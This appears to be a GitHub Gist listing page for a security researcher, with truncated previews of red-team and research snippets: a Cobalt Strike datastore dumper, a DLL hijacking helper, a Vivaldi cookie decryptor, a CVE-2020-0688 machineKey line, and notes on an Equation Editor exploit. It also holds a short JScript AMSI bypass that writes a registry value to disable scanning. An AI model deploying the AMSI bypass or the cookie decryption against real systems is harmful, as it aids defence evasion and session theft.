Skip to content

Instantly share code, notes, and snippets.

rxwx /
Last active September 25, 2023 19:34
Dump items (BOFs, assemblies, files etc.) from the CobaltStrike 4.9+ beacon datastore (stored with BeaconDataStoreProtectItem / data-store load)
from ctypes import wintypes
import argparse
import ctypes
import yara
import hexdump
.text:0000000180010840 ; char __fastcall BeaconDataStoreUnprotectItem(unsigned __int64)
.text:0000000180010840 BeaconDataStoreUnprotectItem proc near ; CODE XREF: sub_1800100F8+9E↑p
.text:0000000180010840 ; sub_1800102E8+AD↑p
rxwx /
Created September 7, 2023 17:54
Decode "Obscured" Check Point Trac.config files
import io
import sys
import string
def get_byte(x):
c = ord(chr(x).lower())
if ((c - 0x30) & 255) < 10:
retval = c - 0x30
rxwx / GetSxsPath.cs
Created July 3, 2023 12:43
Determine redirection path for SxS DotLocal DLL Hijacking
View GetSxsPath.cs
using System;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using static GetSxsPath.NativeMethods;
namespace GetSxsPath
internal class NativeMethods
rxwx /
Created April 15, 2020 10:23
Get Office version that last saved the file
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
rxwx /
Last active May 14, 2020 13:03
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
rxwx / CVE-2020-0688.config
Created February 14, 2020 16:38
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
rxwx /
Created August 13, 2019 09:04
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python <target ip/domain>"
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
Author: Rich Warren
Based on original c# code by Jon Galloway:
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
rxwx /
Last active February 21, 2020 06:19
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop